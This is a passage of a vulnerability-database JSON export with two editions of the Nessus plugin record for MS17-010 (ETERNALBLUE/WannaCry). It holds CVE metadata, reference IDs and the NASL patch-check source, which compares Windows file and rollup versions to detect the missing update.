(EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2019-11-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97737", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145", "http://www.nessus.org/u?d9f569cf", "https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?321523eb", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://www.nessus.org/u?59db5b5b", "http://www.nessus.org/u?065561d0"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-18T12:46:18", "history": [], "viewCount": 2979, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-33313"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810810"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "700059.PRM"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:146236", "PACKETSTORM:156196", "PACKETSTORM:154690", "PACKETSTORM:142181"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0144", "CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96703", "SMNTC-96705", "SMNTC-96707", "SMNTC-96709", "SMNTC-96706", "SMNTC-96704"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"]}, {"type": "threatpost", "idList": ["THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143", "MS:CVE-2017-0144", "MS:CVE-2017-0145", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-18T12:46:18", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2021-10-18T12:46:18", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n script_xref(name:\"MSKB\", value:\"4012598\");\n script_xref(name:\"IAVA\", value:\"2017-A-0065\");\n script_xref(name:\"EDB-ID\", value:\"41891\");\n script_xref(name:\"EDB-ID\", value:\"41987\");\n\n script_name(english:\"MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)\");\n script_summary(english:\"Checks the version of the SYS files.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing a security update. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit these\n vulnerabilities, via a specially crafted packet, to\n execute arbitrary code. (CVE-2017-0143, CVE-2017-0144,\n CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in\n Microsoft Server Message Block 1.0 (SMBv1) due to\n improper handling of certain requests. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted packet, to disclose sensitive\n information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are\nfour of multiple Equation Group vulnerabilities and exploits disclosed\non 2017/04/14 by a group known as the Shadow Brokers. WannaCry /\nWannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit,\nand EternalRocks is a worm that utilizes seven Equation Group\nvulnerabilities. Petya is a ransomware program that first utilizes\nCVE-2017-0199, a vulnerability in Microsoft Office, and then spreads\nvia ETERNALBLUE.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010\");\n # https://blogs.technet.microsoft.com/msrc/2017/04/14/protecting-customers-and-evaluating-risk/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?321523eb\");\n # https://cloudblogs.microsoft.com/microsoftsecure/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/?source=mmpc\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?065561d0\");\n # https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d9f569cf\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/stamparm/EternalRocks/\");\n # https://www.tenable.com/blog/petyanotpetya-ransomware-detection-for-the-modern-enterprise\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?59db5b5b\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows Vista, 2008, 7,\n2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also\nreleased emergency patches for Windows operating systems that are no\nlonger supported, including Windows XP, 2003, and 8.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0148\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/03/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-010';\nkbs = make_list(\n \"4012212\",\n \"4012213\",\n \"4012214\",\n \"4012215\",\n \"4012216\",\n \"4012217\",\n \"4012606\",\n \"4013198\",\n \"4013429\",\n \"4012598\"\n);\n\nvuln = 0;\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2',vista:'2', win7:'1', win8:'0', win81:'0', win10:'0') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_nano() == 1) audit(AUDIT_OS_NOT, \"a currently supported OS (Windows Nano Server)\");\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Embedded\" >< productname)\n exit(0, \"Nessus does not support bulletin / patch checks for Windows Embedded.\");\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share))\n audit(AUDIT_SHARE_FAIL, share);\n\nif (\n ##############\n ## MAY 2017 ##\n ##############\n\n # Windows XP SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x64\") ||\n # Windows XP SP3\n hotfix_is_vulnerable(os:\"5.1\", sp:3, file:\"srv.sys\", version:\"5.1.2600.7208\", min_version:\"5.1.2600.5000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\", arch:\"x86\") ||\n # Windows Server 2003 SP2\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"srv.sys\", version:\"5.2.3790.6021\", min_version:\"5.2.3790.3000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n # Windows 8\n (\n (\"Windows 8\" >< productname && \"Windows 8.1\" >!< productname && \"2012\" >!< productname)\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\")\n )\n ||\n \n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22099\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\")\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"srv.sys\", version:\"6.2.9200.22137\", min_version:\"6.2.9200.16000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4019213\") ||\n\n ##############\n ## MAR 2017 ##\n ##############\n\n # Windows Vista Service Pack 2 / Windows Server 2008\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.19743\", min_version:\"6.0.6002.18000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"srv.sys\", version:\"6.0.6002.24067\", min_version:\"6.0.6002.20000\", dir:\"\\system32\\drivers\", bulletin:bulletin, kb:\"4012598\") ||\n\n # Windows 7 / Windows Server 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012212, 4012215)) ||\n\n # Windows Server 2012\n (\n \"Windows 8\" >!< productname\n &&\n smb_check_rollup(os:\"6.2\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012214, 4012217))\n ) ||\n\n # Windows 8.1 / Windows Server 2012 R2\n smb_check_rollup(os:\"6.3\", sp:0, rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012213, 4012216)) ||\n\n # Windows 10\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10240\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4012606)) ||\n\n # Windows 10 1511\n smb_check_rollup(os:\"10\", sp:0, os_build:\"10586\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013198)) ||\n\n # Windows 10 1607 / Windows Server 2016\n smb_check_rollup(os:\"10\", sp:0, os_build:\"14393\", rollup_date:\"03_2017\", bulletin:bulletin, rollup_kb_list:make_list(4013429))\n)\n{\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "naslFamily": "Windows : Microsoft Bulletins", "cpe": ["cpe:/o:microsoft:windows"], "solution": "Microsoft has released a set of patches for Windows Vista, 2008, 7, 2008 R2, 2012, 8.1, RT 8.1, 2012 R2, 10, and 2016. Microsoft has also released emergency patches for Windows operating systems that are no longer supported, including Windows XP, 2003, and 8.", "nessusSeverity": "High", "cvssScoreSource": "CVE-2017-0148", "vpr": {"risk factor": "Critical", "score": "9.9"}, "exploitAvailable": true, "exploitEase": "Exploits are available", "patchPublicationDate": "2017-03-14T00:00:00", "vulnerabilityPublicationDate": "2017-03-14T00:00:00", "exploitableWith": ["Core Impact", "CANVAS(CANVAS)", "Metasploit(MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption)"]}, "lastseen": "2021-10-18T12:46:18", "differentElements": ["vpr"], "edition": 12}, {"bulletin": {"id": "SMB_NT_MS17-010.NASL", "hash": "b9abd8135dbfca43008678d0346e679b", "type": "nessus", "bulletinFamily": "scanner", "title": "MS17-010: Security Update for Microsoft Windows SMB Server (4013389) (ETERNALBLUE) (ETERNALCHAMPION) (ETERNALROMANCE) (ETERNALSYNERGY) (WannaCry) (EternalRocks) (Petya)", "description": "The remote Windows host is missing a security update. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple remote code execution vulnerabilities exist in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit these vulnerabilities, via a specially crafted packet, to execute arbitrary code. (CVE-2017-0143, CVE-2017-0144, CVE-2017-0145, CVE-2017-0146, CVE-2017-0148)\n\n - An information disclosure vulnerability exists in Microsoft Server Message Block 1.0 (SMBv1) due to improper handling of certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information. (CVE-2017-0147)\n\nETERNALBLUE, ETERNALCHAMPION, ETERNALROMANCE, and ETERNALSYNERGY are four of multiple Equation Group vulnerabilities and exploits disclosed on 2017/04/14 by a group known as the Shadow Brokers. WannaCry / WannaCrypt is a ransomware program utilizing the ETERNALBLUE exploit, and EternalRocks is a worm that utilizes seven Equation Group vulnerabilities. Petya is a ransomware program that first utilizes CVE-2017-0199, a vulnerability in Microsoft Office, and then spreads via ETERNALBLUE.", "published": "2017-03-15T00:00:00", "modified": "2019-11-13T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "href": "https://www.tenable.com/plugins/nessus/97737", "reporter": "This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://github.com/stamparm/EternalRocks/", "http://www.nessus.org/u?321523eb", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0148", "http://www.nessus.org/u?59db5b5b", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "http://www.nessus.org/u?d9f569cf", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010", "http://www.nessus.org/u?065561d0", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144", "http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145"], "cvelist": ["CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-10-19T00:54:29", "history": [], "viewCount": 2979, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:43970", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27802", "1337DAY-ID-27786"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "700099.PRM"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0145/"]}, {"type": "seebug", "idList": ["SSV:92964", "SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0148", "CVE-2017-0144", "CVE-2017-0147", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0143"]}, {"type": "symantec", "idList": ["SMNTC-96707", "SMNTC-96709", "SMNTC-96706", "SMNTC-96704", "SMNTC-96705", "SMNTC-96703"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A", "TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41"]}, {"type": "mmpc", "idList": ["MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143", "MS:CVE-2017-0148"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-10-19T00:54:29", "rev": 2}, "score": {"value": 8.1, "vector": "NONE", "modified": "2021-10-19T00:54:29", "rev": 2}}, "objectVersion": "1.6", "pluginID": "97737", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(97737);\n script_version(\"1.24\");\n script_cvs_date(\"Date: 2019/11/13\");\n\n script_cve_id(\n \"CVE-2017-0143\",\n \"CVE-2017-0144\",\n \"CVE-2017-0145\",\n \"CVE-2017-0146\",\n \"CVE-2017-0147\",\n \"CVE-2017-0148\"\n );\n script_bugtraq_id(\n 96703,\n 96704,\n 96705,\n 96706,\n 96707,\n 96709\n );\n script_xref(name:\"MSFT\", value:\"MS17-010\");\n script_xref(name:\"MSKB\", value:\"4012212\");\n script_xref(name:\"MSKB\", value:\"4012213\");\n script_xref(name:\"MSKB\", value:\"4012214\");\n script_xref(name:\"MSKB\", value:\"4012215\");\n script_xref(name:\"MSKB\", value:\"4012216\");\n script_xref(name:\"MSKB\", value:\"4012217\");\n script_xref(name:\"MSKB\", value:\"4012606\");\n script_xref(name:\"MSKB\", value:\"4013198\");\n script_xref(name:\"MSKB\", value:\"4013429\");\n 